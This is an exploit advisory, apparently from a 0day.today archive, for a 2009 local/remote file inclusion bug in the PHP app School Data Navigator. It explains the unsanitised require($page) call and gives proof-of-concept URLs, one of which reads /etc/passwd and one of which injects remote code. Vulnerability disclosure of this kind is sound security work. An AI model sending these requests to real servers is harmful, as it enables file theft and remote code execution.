School Data Navigator (page) Local/Remote File Inclusion Vulnerability

2009-06-10T00:00:00
ID 1337DAY-ID-5346
Type zdt
Reporter Br0ly
Modified 2009-06-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
School Data Navigator (page) Local/Remote File Inclusion Vulnerability
======================================================================



----------------------------------------------------------------------------------------------------

  Name : School Data Navigator
  Site : http://sourceforge.net/projects/school-data-nav/
  Down : http://216.92.6.173/data_navigator/app_and_readme.zip

----------------------------------------------------------------------------------------------------

 
  Found By : br0ly
  Made in  : Brasil

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Local/Remote File Inclusion
 
  Look this: index.php:48:    require($page); The variable was not declared properly.

  If allow_url_fopen=on   --> RFI;
  If magic_quotes_gpc=off --> LFI;  



----------------------------------------------------------------------------------------------------

  P0c:
 
    LFI:http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
    RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]

  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------



#  0day.today [2017-12-31]  #